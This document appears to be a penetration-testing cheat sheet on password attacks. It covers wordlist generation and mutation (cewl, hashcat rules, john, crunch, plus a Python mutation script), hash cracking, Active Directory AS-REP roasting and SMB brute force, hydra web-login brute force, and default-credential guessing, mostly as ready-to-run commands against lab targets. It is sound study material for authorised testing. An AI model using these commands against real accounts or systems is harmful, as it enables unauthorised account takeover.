Password Attacks


Password Wordlist Creation

Custom wordlist creation

  • Word ideas
    • Duplicate username (upper and lowercase)
  • Upper/Lowercase
    • Capitalize all first letters
    • lowercase all characters
  • Domain name
  • All the months
  • "password"
  • machine name
  • autumn, fall, spring, summer
  • append years
    • Current years
      • for i in $(cat passwords); do echo $i; echo ${i}2019; echo ${i}2020; echo ${i}\!; done
  • add !'s
  • Mutate wordlist using hashcat

    Wordlist scraping tools

  • cewl
    • Scrapes websites for words
    • Example: cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
    • -m 6 Minimum letters per word
    • -d Depth of pages to grab words from
    • --with-numbers Grab words with numbers
    • -w outfile

    Wordlist mutation tools

  • hashcat
    • Wordlist mutation example:
      • hashcat --force --stdout passwords -r /usr/share/hashcat/rules/best64.rule | sort -u
        • Chain wordlist rule mutations
          • hashcat --force --stdout passwords -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles1.rule | sort -u
    • Can create custom rule sets for password list mutation.
  • John the Ripper
    • Edit /etc/john/john.conf
      • [List.Rules:Wordlist] section to define wordlist mutations
      • $ Append a character to the original word in the word list
      • [0-9] All characters between 0 and 9
      • Example rule:
        # Add two numbers to the end of each password
        $[0-9]$[0-9]
    • --rules flag to activate the rules in the configuration file
    • Mutated wordlist creation example: john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
  • Crunch
    • Can create a wordlist based off of known password requirements
      • Example – password must contain: 1 Capital letter, 2x lowercase letters, 2x special characters, 3x numeric, and 8 characters long total
        • crunch 8 8 -t ,@@^^%%%
          • Output would be 160GB
      • Example 2 – Wordlist with characters 0-9, A-F, and between 4 and 6 characters in length
        • crunch 4 6 0123456789ABCDEF -o crunch.txt
      • Example 3 – Create wordlist using a character set
        • /usr/share/crunch/charset.lst
        • crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt
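
As an added example (not part of the original notes), the Python script below does the custom wordlist mutation described under "Custom wordlist creation" above (case forms, appended years and "!", deduplicated like sort -u) and also expands a john-style append rule such as `$[0-9]$[0-9]` from the John the Ripper section. The seed words are constructed, and the rule interpreter covers only the `$` command and `[...]` classes shown above, not the rest of john's rule language.

```python
import re
from itertools import product

YEARS = ["2019", "2020"]   # years used in the one-liner above; adjust to the current date
SUFFIXES = ["", "!"]       # "add !'s"

def case_variants(word):
    """Original, lowercase, Capitalized-first-letters and UPPERCASE forms, deduplicated."""
    forms = [word, word.lower(), word.lower().title(), word.upper()]
    return list(dict.fromkeys(forms))

def mutate(words, years=YEARS, suffixes=SUFFIXES):
    """Expand each base word: every case form x (no year | each year) x (nothing | '!')."""
    out = []
    for word in words:
        for base, year, suffix in product(case_variants(word), [""] + list(years), suffixes):
            out.append(f"{base}{year}{suffix}")
    return list(dict.fromkeys(out))   # drop duplicates, keep first-seen order

def _charclass(spec):
    """Expand a john preprocessor class body such as '0-9' or 'a-c!' into its characters."""
    chars, i = [], 0
    while i < len(spec):
        if i + 2 < len(spec) and spec[i + 1] == "-":
            chars.extend(chr(c) for c in range(ord(spec[i]), ord(spec[i + 2]) + 1))
            i += 3
        else:
            chars.append(spec[i])
            i += 1
    return chars

_APPEND = re.compile(r"\$(?:\[([^\]]+)\]|(.))")   # matches `$X` or `$[class]`

def apply_append_rule(word, rule):
    """Apply a john-style rule made only of `$` (append) commands, e.g. '$[0-9]$[0-9]'.
    `$X` appends X; `$[...]` fans out into one candidate per class character, so
    '$[0-9]$[0-9]' yields 100 candidates per word. Other john commands are not handled."""
    choices = [_charclass(cls) if cls else [ch] for cls, ch in _APPEND.findall(rule)]
    return [word + "".join(tail) for tail in product(*choices)]

if __name__ == "__main__":
    seeds = ["autumn", "Megacorp"]   # constructed sample seed words
    for candidate in mutate(seeds):
        print(candidate)
    print(len(apply_append_rule("password", "$[0-9]$[0-9]")))   # 100
```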

    Cracking Hashes

  • Hashcat
    • Can crack passwords using brute force, a word list, or a combination
    • Wordlist attack syntax: hashcat -a 0 -m <mode for hash type> <file containing hash(es)> <word list> [-r <rules file>]
      • Using a rules file mutates the wordlist on the fly.
        • rules/best64.rule is a solid starting point for rule usage
      • rockyou.txt is usually a good wordlist to start with.
    • Identify hash mode for hash type
      • Go to https://hashcat.net/wiki/doku.php?id=example_hashes
      • Search for the first characters of the hash; this will typically find the mode you are looking for.

    Active Directory

  • Query LDAP for users to attack
  • Check password policies for lockouts, lengths, etc.
    • crackmapexec smb --pass-pol <ip address>
  • Pre-auth attack
    • ASREPRoast
      • Queries the target domain for users with 'Do not require Kerberos pre-authentication' set and exports their TGTs for cracking.
        • impacket-GetNPUsers
        • Usage: GetNPUsers -dc-ip <ip address> -request '<Domain Name - Example: htb.local>/'
        • Format output for hashcat: GetNPUsers -dc-ip <ip address> -request '<Domain Name - Example: htb.local>/' -format hashcat
    • Kerbrute
      • Does not generate the typical failed-login error code
    • pyKerbrute
      • Supports NTLM-hash brute forcing and TCP transport; Kerbrute only supports UDP
  • SMB
    • Brute force username & password list: crackmapexec smb <ip address> -u <user list> -p <password list>
    • Brute force username & hash list: crackmapexec smb <ip address> -u <user> -H <hash>
  • Local Brute Force
    • Spray-Passwords
      • https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1
      • Sprays passwords locally
      • Test passwords against other user & admin accounts as another user

    Web application

  • Tools
    • Hydra
      • hydra <IP Address> http-post-form -l <username> -P <password file> "<Path>:<Data>:<Failed Login Text>"
      • hydra dms-pit.htb http-post-form -l michelle -P /usr/share/wordlists/rockyou.txt "/seeddms51x/seeddms/op/op.Login.php:login=^USER^&pwd=^PASS^&lang=:incorrect"

    Guessing credentials

  • <service name>:<service name>
  • <username>:<username>
  • <application name>:<application name>
  • /usr/share/seclists/Passwords/Default-Credentials

    File types to hashes

  • SSH
    • ssh2john - crack hash with CPU
    • sshng2john - crack hash using Jumbo John (use GPU)
  • Password-protected Office documents (Excel, Word, etc.): office2john